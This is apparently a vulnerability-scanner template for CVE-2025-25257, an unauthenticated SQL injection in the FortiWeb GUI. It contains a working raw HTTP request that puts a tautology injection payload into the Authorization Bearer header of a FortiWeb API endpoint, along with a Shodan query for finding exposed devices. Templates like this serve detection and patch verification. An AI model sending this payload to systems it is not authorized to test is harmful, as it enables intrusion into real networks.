info: name:Unauthenticated SQL injection in FortiWeb GUI author:watchtowr,johnk3r severity:critical description:An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in FortiWeb may allow an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests. reference: -https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/ -https://fortiguard.fortinet.com/psirt/FG-IR-25-151 metadata: verified:true max-request:1 shodan-query:ssl:"cn=fortiweb" tags:cve,2025,fortinet,fortiweb
http: -raw: -| GET /api/fabric/device/status HTTP/1.1 Host:{{Hostname}} Authorization:Bearer AAAAAA'or'1'='1
matchers-condition:and matchers: -type: word words: -'serial' -'fortiweb'